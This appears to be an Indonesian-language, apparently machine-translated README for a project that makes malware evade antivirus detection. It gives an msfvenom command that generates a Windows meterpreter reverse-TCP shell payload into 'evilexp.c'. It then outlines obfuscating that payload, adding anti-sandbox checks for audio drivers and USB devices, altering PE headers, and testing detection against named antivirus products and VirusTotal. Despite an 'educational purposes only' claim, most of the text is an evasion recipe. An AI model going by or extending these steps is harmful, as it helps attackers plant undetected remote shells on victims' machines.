InvisMalware

1. Perkenalan
2. Fitur
3. Instalasi
4. Penggunaan
5. Metodologi Eksperimen
6. Pengujian
7. Berkontribusi
8. Lisensi

Invismalware adalah proyek yang dirancang untuk menunjukkan teknik penggelapan malware canggih yang memotong deteksi antivirus. Eksperimen malware yang digerakkan oleh penelitian ini berfokus pada penggunaan metode pengayaan, seperti modifikasi kode dan strategi anti-sandbox, untuk menghindari deteksi malware statis dan dinamis.

Proyek ini hanya untuk tujuan pendidikan , dimaksudkan untuk memberikan wawasan tentang strategi pertahanan malware modern dengan belajar dari teknik penghindaran yang digunakan oleh aktor jahat.

• Pembuatan Shellcode : Buat muatan tcp shell terbalik kustom menggunakan MSFVENOM.
• Kode Kewayaan : Modifikasi kode malware untuk menghindari deteksi antivirus dengan menambahkan NOP, memanipulasi header PE, dan banyak lagi.
• Analisis anti-dinamis : Sertakan pemeriksaan untuk mendeteksi lingkungan kotak pasir seperti driver audio dan keberadaan perangkat USB.
• Manipulasi header PE : Menyamarkan malware dengan mengubah header yang dapat dieksekusi (PE) portabel untuk menghindari deteksi berbasis tanda tangan.
• Perhitungan laju penghindaran : Ukur efektivitas teknik penghindaran dengan membandingkan hasil di berbagai mesin antivirus.

Untuk memulai, klon repositori dan instal dependensi yang diperlukan.

• Python 3.x
• VirtualBox/VMware (untuk pengujian di lingkungan virtual)
• Metasploit Framework (untuk menghasilkan shellcode)
• PE-Bear (untuk manipulasi header PE)

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

Gunakan msfvenom untuk menghasilkan tcp shellcode terbalik:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

Edit file evilexp.c untuk mengaburkan kode dan menghindari deteksi.

Menyebarkan malware dalam mesin virtual yang aman dan terisolasi untuk menguji perilakunya dan mengukur tingkat deteksi.

Unggah malware Anda ke Virustotal untuk mengevaluasi tingkat penghindarannya di beberapa mesin antivirus.

Proyek ini mengikuti metodologi empat tahap untuk mencapai penghindaran malware:

1. Pembuatan Shellcode : Buat shellcode terbalik baseline.
2. Modifikasi Kode : Mengaburkan shellcode untuk menghindari deteksi.
3. Analisis anti-dinamis : Tambahkan deteksi kotak pasir ke bypass alat analisis dinamis.
4. Modifikasi header PE : Ubah header PE untuk lebih mengaburkan tanda tangan malware.

Jalankan malware pada mesin virtual Anda yang dilengkapi dengan perangkat lunak antivirus seperti Kaspersky , Windows Defender , atau Bitdefender .

Unggah malware yang dimodifikasi ke VirusTotal dan periksa berapa banyak mesin antivirus yang berhasil mendeteksinya.

Kami menyambut kontribusi untuk meningkatkan proyek. Jika Anda ingin berkontribusi:

1. Garpu repositori.
2. Buat cabang baru untuk fitur atau perbaikan bug Anda.
3. Kirimkan permintaan tarik dengan informasi terperinci tentang perubahan Anda.

Proyek ini dilisensikan di bawah lisensi MIT. Lihat file lisensi untuk detailnya.